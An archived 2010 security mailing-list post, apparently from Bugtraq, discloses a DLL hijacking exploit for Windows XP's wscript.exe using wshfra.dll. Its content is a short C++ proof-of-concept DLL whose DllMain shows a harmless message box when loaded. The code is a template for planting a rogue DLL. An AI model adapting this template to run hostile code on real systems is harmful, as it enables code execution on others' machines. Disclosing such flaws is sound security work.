New User, Welcome!     Login

Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)

Related Terms:
case
From: info securitylab ir
To: bugtraq securityfocus com
Cc:
Subject: Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)
Date: Fri - Aug 27, 2010 10:44 AM


=====================================================================
Founded By: Kamran Safaei Tabrizi(k4mr4n_st(at)yahoo(dot)com)
Securitylab Security Research Team
Website: http://www.securitylab.ir
Special Thanks: Mazo shinozuki, BangoDragon
=====================================================================
#include "stdafx.h"

void init() {
MessageBox(NULL,"Mazo!", "k4mr4n!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}
=============================================




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!